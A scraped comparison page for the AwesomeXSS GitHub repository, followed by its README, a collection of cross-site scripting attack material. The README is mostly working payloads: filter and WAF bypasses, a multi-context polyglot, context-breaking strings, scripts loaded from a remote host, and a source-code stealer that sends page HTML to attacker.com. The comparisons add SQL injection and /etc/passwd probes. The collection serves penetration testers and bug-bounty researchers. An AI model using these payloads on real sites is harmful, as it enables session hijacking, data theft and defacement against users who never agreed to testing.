Convert Figma logo to code with AI

s0md3v logoAwesomeXSS

Awesome XSS stuff

4,743
767
4,743
0
View on GitHub

Top Related Projects

payloadbox's avatar

xss-payload-list

6,105

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

swisskyrepo's avatar

PayloadsAllTheThings

60,720

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

EdOverflow's avatar

bugbounty-cheatsheet

5,837

A list of interesting payloads, tips and tricks for bug bounty hunters.

cure53's avatar

XSSChallengeWiki

1,576

Welcome to the XSS Challenge Wiki!

danielmiessler's avatar

SecLists

57,590

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Quick Overview

AwesomeXSS is a curated list of awesome XSS (Cross-Site Scripting) resources, including cheat sheets, payloads, and tools. It serves as a comprehensive reference for security researchers, bug bounty hunters, and web developers interested in understanding and mitigating XSS vulnerabilities.

Pros

  • Provides a centralized and well-organized collection of XSS-related resources.
  • Covers a wide range of XSS-related topics, from payloads and cheat sheets to tools and tutorials.
  • Regularly updated with new and relevant content.
  • Contributes to the security community by sharing knowledge and best practices.

Cons

  • As a curated list, the project's scope is limited to XSS-related resources, and it may not cover other web application security topics.
  • The project relies on community contributions, which can lead to inconsistencies in the quality and formatting of the resources.
  • Some of the resources may become outdated over time, requiring regular maintenance and updates.

Code Examples

This project is not a code library, so there are no code examples to provide.

Getting Started

This project is a curated list of resources, so there are no specific getting started instructions. Users can navigate the repository and explore the various sections to find the resources that are most relevant to their needs.

Competitor Comparisons

payloadbox logo

xss-payload-list

6,105

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

Pros of xss-payload-list

  • More extensive collection of XSS payloads, organized into categories
  • Includes payloads for specific scenarios (e.g., polyglots, filter evasion)
  • Regularly updated with new contributions

Cons of xss-payload-list

  • Less focus on educational content and explanations
  • Lacks additional resources like tools or articles
  • May be overwhelming for beginners due to the sheer number of payloads

Code Comparison

AwesomeXSS example:

<svg/onload=alert(1)>

xss-payload-list example:

<svg/onload=alert`1`>

Both repositories provide similar basic XSS payloads, but xss-payload-list offers more variations and advanced techniques. For instance:

AwesomeXSS:

<script>alert(1)</script>

xss-payload-list:

<script>eval(atob('YWxlcnQoMSk='))</script>

The xss-payload-list example demonstrates a more complex payload using base64 encoding to evade filters.

While AwesomeXSS focuses on providing a curated list of resources and explanations, xss-payload-list serves as a comprehensive collection of XSS payloads for various scenarios. AwesomeXSS is better suited for beginners and those seeking to understand XSS, while xss-payload-list is more useful for experienced penetration testers and security researchers looking for a wide range of payload options.

swisskyrepo logo

PayloadsAllTheThings

60,720

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Pros of PayloadsAllTheThings

  • Broader scope covering various security topics beyond XSS
  • More frequently updated with contributions from a larger community
  • Includes detailed explanations and methodologies for different attack vectors

Cons of PayloadsAllTheThings

  • Less focused on XSS specifically, which may require more navigation for XSS-only research
  • Larger repository size may be overwhelming for beginners looking for quick XSS references

Code Comparison

AwesomeXSS:

<svg onload=alert(1)>
<img src=x onerror=alert('XSS')>

PayloadsAllTheThings:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>

Both repositories provide similar XSS payload examples, but PayloadsAllTheThings offers a wider variety of payloads for different contexts and scenarios. AwesomeXSS focuses more on creative and lesser-known XSS vectors, while PayloadsAllTheThings provides a comprehensive collection of payloads for various security testing purposes.

Overall, PayloadsAllTheThings is a more extensive resource for security researchers and penetration testers, covering a broader range of topics. AwesomeXSS, on the other hand, is a more specialized repository for those specifically interested in XSS vulnerabilities and techniques.

EdOverflow logo

bugbounty-cheatsheet

5,837

A list of interesting payloads, tips and tricks for bug bounty hunters.

Pros of bugbounty-cheatsheet

  • Broader scope covering various bug bounty topics, not limited to XSS
  • More structured organization with clear categories
  • Regularly updated with contributions from the community

Cons of bugbounty-cheatsheet

  • Less in-depth coverage of XSS techniques compared to AwesomeXSS
  • May be overwhelming for beginners due to the wide range of topics

Code Comparison

AwesomeXSS (XSS payload example):

<svg/onload=alert(1)>

bugbounty-cheatsheet (XSS payload example):

<img src=x onerror=alert(1)>

Both repositories provide XSS payload examples, but AwesomeXSS offers a more extensive collection specifically focused on XSS techniques.

Summary

AwesomeXSS is a specialized resource for XSS vulnerabilities, providing a comprehensive list of payloads and techniques. bugbounty-cheatsheet, on the other hand, covers a wider range of bug bounty topics, making it a more versatile resource for security researchers. While AwesomeXSS offers more depth in XSS-related content, bugbounty-cheatsheet provides a broader overview of various security vulnerabilities and techniques. The choice between the two depends on whether you're specifically focusing on XSS or looking for a more general bug bounty resource.

cure53 logo

XSSChallengeWiki

1,576

Welcome to the XSS Challenge Wiki!

Pros of XSSChallengeWiki

  • Focuses on practical XSS challenges, providing hands-on learning experiences
  • Regularly updated with new challenges and solutions
  • Maintained by a reputable security company (Cure53)

Cons of XSSChallengeWiki

  • Limited to XSS-specific content, lacking broader web security coverage
  • May be more advanced for beginners compared to AwesomeXSS
  • Fewer resources for XSS prevention and mitigation strategies

Code Comparison

XSSChallengeWiki example (DOM-based XSS):

<script>
document.write("<b>Current URL</b> : " + document.baseURI);
</script>

AwesomeXSS example (Bypass filter):

<svg onload=alert(1)>

Both repositories provide valuable resources for understanding and learning about XSS vulnerabilities. XSSChallengeWiki offers a more focused, challenge-based approach to learning XSS techniques, while AwesomeXSS provides a comprehensive collection of XSS-related information, including payloads, bypasses, and resources.

XSSChallengeWiki is better suited for intermediate to advanced users looking to practice their XSS skills, while AwesomeXSS serves as an excellent starting point for beginners and a reference for more experienced security professionals.

Ultimately, both repositories complement each other well, with XSSChallengeWiki offering practical exercises and AwesomeXSS providing a broader overview of XSS concepts and techniques.

danielmiessler logo

SecLists

57,590

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Pros of SecLists

  • Comprehensive collection of multiple types of security-related lists
  • Regularly updated with contributions from the community
  • Useful for various security testing scenarios beyond just XSS

Cons of SecLists

  • Less focused on XSS specifically, requiring more filtering for XSS-related content
  • Larger repository size, which may be overwhelming for users seeking only XSS payloads

Code Comparison

While a direct code comparison isn't applicable due to the nature of these repositories, we can compare sample content:

AwesomeXSS:

<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<script>alert(1)</script>

SecLists:

/etc/passwd
admin' --
<script>alert(1)</script>
' UNION SELECT username, password FROM users--

AwesomeXSS focuses exclusively on XSS payloads, while SecLists covers a broader range of security testing inputs, including but not limited to XSS.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

AwesomeXSS

This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.

Awesome contents

Awesome Challenges

Awesome Reads & Presentations

Awesome Tools

Awesome XSS Mind Maps

A beautiful XSS mind map by Jack Masa, here

Awesome DOM XSS

  • Does your input go into a sink? Vulnerable
  • It doesn't? Not vulnerable

Source: An input that could be controlled by an external (untrusted) source.

document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage

Sink: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.

eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location

This comprehensive list of sinks and source is taken from domxsswiki.

Awesome Payloads

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>

Awesome Polyglots

Here's an XSS polyglot that I made which can break out of 20+ contexts:

%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

Explanation of how it works, here

Awesome Tags & Event Handlers

Some less detected event handlers

ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel

Some HTML Tags that you will be using

img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video

Awesome Context Breaking

HTML Context

Case: <tag>You searched for $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var new something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Awesome Exploits

Replace all links
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});
Source Code Stealer
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

Awesome Probing

If nothing of this works, take a look at Awesome Bypassing section

First of all, enter a non-malicious string like d3v and look at the source code to get an idea about number and contexts of reflections.
Now for attribute context, check if double quotes (") are being filtered by entering x"d3v. If it gets altered to x&quot;d3v, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering x'd3v, if it gets altered to x&apos;, you are doomed. The only thing you can try is encoding.
If the quotes are not being filtered, you can simply try payloads from Awesome Context Breaking section.
For javascript context, check which quotes are being used for example if they are doing

variable = 'value' or variable = "value"

Now lets say single quotes (') are in use, in that case enter x'd3v. If it gets altered to x\'d3v, try escaping the backslash () by adding a backslash to your probe i.e. x\'d3v. If it works use the following payload:

\'-alert()//

But if it gets altered to x\\\'d3v, the only thing you can try is closing the script tag itself by using

</script><svg onload=alert()>

For simple HTML context, the probe is x<d3v. If it gets altered to x&gt;d3v, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is x<xxx>. If it gets stripped or altered in any way, it means the filter is looking for a pair of < and >. It can simply bypassed using

<svg onload=alert()//

or this (it will not work in all cases)

<svg onload=alert()

If the your dummy tags lands in the source code as it is, go for any of these payloads

<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>

Awesome Bypassing

Note: None of these payloads use single (') or double quotes (").

  • Without event handlers
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
  • Without space
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
  • Without slash (/)
<svg onload=confirm()>
<img src=x onerror=confirm()>
  • Without equal sign (=)
<script>confirm()</script>
  • Without closing angular bracket (>)
<svg onload=confirm()//
  • Without alert, confirm, prompt
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
  • Without a Valid HTML tag
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it
  • Bypass tag blacklisting
</ScRipT>
</script
</script/>
</script x>

Awesome Encoding

HTMLCharNumericDescriptionHexCSS (ISO)JS (Octal)URL
&quot;"&#34;quotation marku+0022\0022\42%22
&num;#&#35;number signu+0023\0023\43%23
&dollar;$&#36;dollar signu+0024\0024\44%24
&percnt;%&#37;percent signu+0025\0025\45%25
&amp;&&#38;ampersandu+0026\0026\46%26
&apos;'&#39;apostropheu+0027\0027\47%27
&lpar;(&#40;left parenthesisu+0028\0028\50%28
&rpar;)&#41;right parenthesisu+0029\0029\51%29
&ast;*&#42;asterisku+002A\002a\52%2A
&plus;+&#43;plus signu+002B\002b\53%2B
&comma;,&#44;commau+002C\002c\54%2C
&minus;-&#45;hyphen-minusu+002D\002d\55%2D
&period;.&#46;full stop; periodu+002E\002e\56%2E
&sol;/&#47;solidus; slashu+002F\002f\57%2F
&colon;:&#58;colonu+003A\003a\72%3A
&semi;;&#59;semicolonu+003B\003b\73%3B
&lt;<&#60;less-thanu+003C\003c\74%3C
&equals;=&#61;equalsu+003D\003d\75%3D
&gt;>&#62;greater-than signu+003E\003e\76%3E
&quest;?&#63;question marku+003F\003f\77%3F
&commat;@&#64;at sign; commercial atu+0040\0040\100%40
&lsqb;[&#91;left square bracketu+005B\005b\133%5B
&bsol;\&#92;backslashu+005C\005c\134%5C
&rsqb;]&#93;right square bracketu+005D\005d\135%5D
&Hat;^&#94;circumflex accentu+005E\005e\136%5E
&lowbar;_&#95;low lineu+005F\005f\137%5F
&grave;`&#96;grave accentu+0060\0060\u0060%60
&lcub;{&#123;left curly bracketu+007b\007b\173%7b
&verbar;|&#124;vertical baru+007c\007c\174%7c
&rcub;}&#125;right curly bracketu+007d\007d\175%7d

Awesome Tips & Tricks

  • http(s):// can be shortened to // or /\\ or \\.
  • document.cookie can be shortened to cookie. It applies to other DOM objects as well.
  • alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
  • You can use // to close a tag instead of >.
  • I have found that confirm is the least detected pop-up function so stop using alert.
  • Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
  • The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)

Awesome Credits

All the payloads are crafted by me unless specified.